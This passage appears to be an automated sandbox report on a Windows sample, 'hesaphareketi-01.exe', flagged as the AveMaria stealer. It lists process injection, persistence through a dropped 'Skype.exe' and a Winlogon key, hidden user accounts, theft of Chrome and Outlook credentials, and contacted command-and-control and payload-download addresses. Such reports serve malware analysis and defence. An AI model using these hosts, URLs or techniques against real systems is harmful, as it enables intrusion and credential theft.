        Source: 00000011.00000002.510538676.000000000054F000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000000.00000002.372592569.0000000003609000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: String function: 042058A0 appears 81 times
        Source: hesaphareketi-01.exeBinary or memory string: OriginalFilename vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 00000000.00000000.240230672.0000000000322000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 00000000.00000002.373581083.0000000005630000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameGppieq.dll" vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 0000000F.00000002.368976153.00000000001E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 00000010.00000002.370053945.00000000002D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 00000011.00000000.370606839.0000000000952000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exeBinary or memory string: OriginalFilenameConsoleApp19.exe, vs hesaphareketi-01.exe
        Source: hesaphareketi-01.exeVirustotal: Detection: 31%
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Users\user\Desktop\hesaphareketi-01.exe
        Source: hesaphareketi-01.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\hesaphareketi-01.exe 'C:\Users\user\Desktop\hesaphareketi-01.exe'
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeProcess created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
        Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@7/7@2/2
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_042094E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,17_3_042094E0
        Source: hesaphareketi-01.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: hesaphareketi-01.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: hesaphareketi-01.exe, 00000011.00000003.383843457.0000000003FE1000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
        Source: hesaphareketi-01.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: hesaphareketi-01.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: hesaphareketi-01.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: hesaphareketi-01.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeCode function: 17_3_04208C40 GetLastError,GetVersionExW,FormatMessageW,FormatMessageA,_free,LocalFree,_free,17_3_04208C40
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeFile created: C:\Program Files\Microsoft DN1
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: hesaphareketi-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: hesaphareketi-01.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: hesaphareketi-01.exe
        Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: hesaphareketi-01.exe, 00000011.00000003.383843457.0000000003FE1000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Code function: 0_2_00DD902F push esi; retf 0_2_00DD9030
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Code function: 0_2_00DD9206 push esp; retf 0_2_00DD9210
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Code function: 0_2_00DD923A push esp; retf 0_2_00DD923B
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Code function: 0_2_00DD931C push ebx; retf 0_2_00DD932E
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Code function: 0_2_00DD8C4A push 8B000002h; retf 0_2_00DD8C4F
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04268D05 push ecx; ret 17_3_04268D18
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_0426981B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,17_3_0426981B
        Source: hesaphareketi-01.exe Static PE information: 0x8A1682B9 [Mon Jun 1 00:24:25 2043 UTC]
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe (dropped file)
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe (dropped file)

        Boot Survival:

        Creates an undocumented autostart registry key
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe\:Zone.Identifier:$DATA

        Hooking and other Techniques for Hiding and Protection:

        Contains functionality to hide user accounts
        Source: hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
        Source: hesaphareketi-01.exe String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        Source: hesaphareketi-01.exe, 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe File opened: C:\Users\user\Desktop\:Zone.Identifier read attributes | delete
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 2256 Thread sleep count: 1144 > 30
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 2256 Thread sleep count: 34 > 30
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 2256 Thread sleep time: -34000s >= -30000s
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 6220 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe TID: 6784 Thread sleep time: -30000s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe TID: 6564 Thread sleep count: 60 > 30
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_042097E0 GetSystemTime followed by cmp: cmp edx, 04h and CTI: jc 0420983Bh 17_3_042097E0
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Window / User API: threadDelayed 1144
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Process information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04209970 GetSystemInfo,17_3_04209970
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04265FCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_3_04265FCC
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_0426981B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,17_3_0426981B
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory allocated: page read and write | page guard
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04265FCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_3_04265FCC

        HIPS / PFW / Operating System Protection Evasion:

        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 400000
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 401000
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 414000
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 419000
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 54F000
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 552000
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 553000
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: A8F008
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory allocated: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 400000 protect: page execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Memory written: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Process created: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmp Binary or memory string: Progman
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
        Source: hesaphareketi-01.exe, 00000011.00000002.512375737.00000000016F0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Queries volume information: C:\Users\user\Desktop\hesaphareketi-01.exe VolumeInformation
        Source: C:\Users\user\Desktop\hesaphareketi-01.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_042097E0 GetSystemTime,GetCurrentProcessId,GetTickCount,QueryPerformanceCounter,17_3_042097E0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_042094E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,17_3_042094E0

        Lowering of HIPS / PFW / Operating System Security Settings:

        Increases the number of concurrent connection per server for Internet Explorer
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10

        Stealing of Sensitive Information:

        Yara detected AveMaria stealer
        Tries to steal Mail credentials (via file access)
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

        Remote Access Functionality:

        Yara detected AveMaria stealer
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04224C20 sqlite3_bind_int,17_3_04224C20
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04224C40 sqlite3_bind_int64,17_3_04224C40
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04224CF0 sqlite3_bind_text,17_3_04224CF0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04224CC0 sqlite3_bind_null,17_3_04224CC0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04224D20 sqlite3_bind_text16,17_3_04224D20
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04224D50 sqlite3_bind_value,17_3_04224D50
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04224EE0 sqlite3_bind_zeroblob,17_3_04224EE0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04224F70 sqlite3_bind_parameter_count,17_3_04224F70
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04224FF0 sqlite3_bind_parameter_name,17_3_04224FF0
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_04223030 sqlite3_clear_bindings,_memset,17_3_04223030
        Source: C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe Code function: 17_3_042250E0 sqlite3_bind_parameter_index,17_3_042250E0

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Registry Run Keys / Startup Folder11Process Injection312Disable or Modify Tools1OS Credential Dumping1System Time Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Deobfuscate/Decode Files or Information1Input Capture11System Information Discovery17Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery11SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSProcess Discovery2Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading3Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection312Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Users1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        [Behavior graph image not reproduced. Behavior Graph ID: 502776, Sample: hesaphareketi-01.exe, Startdate: 14/10/2021, Architecture: WINDOWS, Score: 100]


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label | Link
        hesaphareketi-01.exe | 31% | Virustotal | | Browse
        hesaphareketi-01.exe | 100% | Joe Sandbox ML | |

        Dropped Files

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skype.exe | 100% | Joe Sandbox ML | |
        C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe | 100% | Joe Sandbox ML | |
        C:\Users\user\AppData\Local\Temp\hesaphareketi-01.exe | 31% | Virustotal | | Browse

        Unpacked PE Files

        Source | Detection | Scanner | Label | Link | Download
        17.2.hesaphareketi-01.exe.400000.0.unpack | 100% | Avira | TR/Redcap.ghjpt | | Download File

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label | Link
        atifgabuying.ddns.net | 0% | Avira URL Cloud | safe |

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        store2.gofile.io | 31.14.69.10 | true | false | | high
        atifgabuying.ddns.net | 185.66.91.154 | true | true | | unknown

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        atifgabuying.ddns.net | true | Avira URL Cloud: safe | unknown
        https://store2.gofile.io/download/a3cd5cbe-ac92-4ed8-a75c-282d6ded34cd/Gppieq.dll | false | | high

              URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        https://store2.gofile.io | hesaphareketi-01.exe, 00000000.00000002.372341760.0000000002601000.00000004.00000001.sdmp | false | | high
        https://github.com/syohex/java-simple-mine-sweeperC: | hesaphareketi-01.exe, 00000000.00000002.372661566.0000000003681000.00000004.00000001.sdmp, hesaphareketi-01.exe, 00000011.00000002.510453136.0000000000400000.00000040.00000001.sdmp | false | | high
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | hesaphareketi-01.exe, 00000000.00000002.372341760.0000000002601000.00000004.00000001.sdmp | false | | high
        https://github.com/syohex/java-simple-mine-sweeper | hesaphareketi-01.exe | false | | high

                      Contacted IPs


                      Public

        IP | Domain | Country | ASN | ASN Name | Malicious
        31.14.69.10 | store2.gofile.io | Virgin Islands (BRITISH) | 199483 | LINKER-ASFR | false
        185.66.91.154 | atifgabuying.ddns.net | Ukraine | 201184 | BRNET-ASUA | true

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:502776
                      Start date:14.10.2021
                      Start time:12:19:40
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 11m 9s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:hesaphareketi-01.exe
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:25
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.phis.troj.spyw.expl.evad.winEXE@7/7@2/2
                      EGA Information:Failed
                      HDC Information:
                      • Successful, ratio: 6.2% (good quality ratio 5.3%)
                      • Quality average: 52.9%
                      • Quality standard deviation: 29.3%
                      HCA Information:
                      • Successful, ratio: 72%
                      • Number of executed functions: 36
                      • Number of non-executed functions: 52
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .exe
                      Warnings:
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.49.150.241, 51.11.168.232, 131.253.33.200, 13.107.22.200, 20.82.210.154, 95.100.218.79, 95.100.216.89, 8.247.248.249, 8.247.248.223, 8.247.244.249, 93.184.220.29, 20.199.120.85, 20.50.102.62, 23.54.159.123, 2.21.98.11, 2.21.98.8, 40.112.88.60, 23.52.67.98, 23.52.67.112, 20.199.120.182
